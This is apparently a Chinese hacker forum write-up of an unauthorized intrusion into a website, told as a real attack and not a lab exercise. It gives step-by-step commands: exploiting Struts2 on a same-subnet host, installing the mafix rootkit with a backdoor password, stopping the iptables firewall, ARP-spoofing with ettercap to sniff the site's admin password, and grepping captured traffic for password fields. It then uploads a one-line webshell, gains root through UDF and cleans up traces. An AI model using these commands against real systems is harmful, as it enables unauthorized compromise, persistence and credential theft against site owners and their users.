目标：www.xxx.com

0x01 主站踩点

主站dedecms 目前公布的0day没有一个能用的，并且后台不是默认的，google hack无果。

0x02 旁站分析

旁站有二十多个，大部分是现场的cms的二次开发，没有漏洞，还有一个bbs dz，同样也没有漏洞

0x03 C段Linux主机突破

查询C段浏览网站发现一个 ssss.com/login.action ，熟悉吧 struct2代码执行不解释   

0x04 Linux主机栽Rookit

这里我用的Rookit是mafix

执行命令：

tar zxvf mafix.tar.gz

chmod +x root

./root password 23141

Putty登录

注意如果防火墙开着的话，不愿意在防火墙里添加规则的话可以关掉防火墙

停止防火墙

/etc/init.d/iptables stop

版本

0x05  Linux主机安装ettercap 嗅探密码

1、下载与安装EPEL的RPM包。

rpm -ivh http://dl.fedoraproject.org/pub/epel/5/i386/epel-release-5-4.noarch.rpm

2、 yum -y install ettercap

开始嗅探

开启转发（可能不需要）

echo 1 > /proc/sys/net/ipv4/ip_forward

嗅探

ettercap –T –M arp /目标ip/80 /网关/ -w /tmp/log.txt

嗅探时间可能会挺长可以后台运行

nohup ettercap –T –M arp /目标ip/80 /网关/-w /tmp/log.txt

0x06 数据筛选

由于这个网站的数据特别大，一小时的数据有1g多，好吧，grep筛选出

抓包分析出目标站前台提交的密码的字段 pwd

cat /tmp/log.txt | grep –a “&pwd=” | more

好吧，每隔几小时我就看一次，过了半天，嗅到后台密码了，同时也嗅到后台地址了

www.xxx.com/xxx/login.php]http://www.xxx.com/xxx/login.php]www.xxx.com/xxx/login.php

0x07 上传一句话 root提权

上传一句话，翻文件，找到了Root，结合我的udf api 添加用户提权成功。

0x08 擦屁股。